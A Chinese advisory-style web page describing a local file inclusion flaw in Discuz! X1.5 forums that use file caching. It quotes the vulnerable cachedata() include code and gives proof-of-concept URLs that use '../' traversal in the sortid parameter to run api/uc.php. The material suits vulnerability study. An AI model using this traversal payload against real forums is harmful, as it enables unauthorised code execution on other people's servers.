网站维护：DISCUZ X1.5 本地文件包含漏洞

DISCUZX1.5 本地文件包含，当然是有条件的，就是使用文件作为缓存。　　

config_global.php　　

$_config['cache']['type'] = ‘file’;　　

function cachedata($cachenames) {　　

……　　

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;　　

……　　

if($isfilecache) {　　

$lostcaches = array();　　

foreach($cachenames as $cachename) {　　

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {　　$lostcaches[] = $cachename;　　

}　　

}　　

……　　

}　　

地址：　　

http://localhost:8080/bbs/forum.phpmod=post&action=threadsorts&sortid=ygjgj/../../../api/uc　　

http://localhost:8080/bbs/forum.phpmod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried　　

执行了 api/uc.php 页面代码了。

【关闭窗口】

公司地址：中国.上海市.嘉定区金沙江西路1555号西郊商务园c1区6号楼6楼总机：021-60482289 传真：021-60482289

邮编：20000 旗下网站：纯点网络站长统计沪ICP备10218526号-4

保密声明 | 法律公告 | 责任声明 | 隐私保护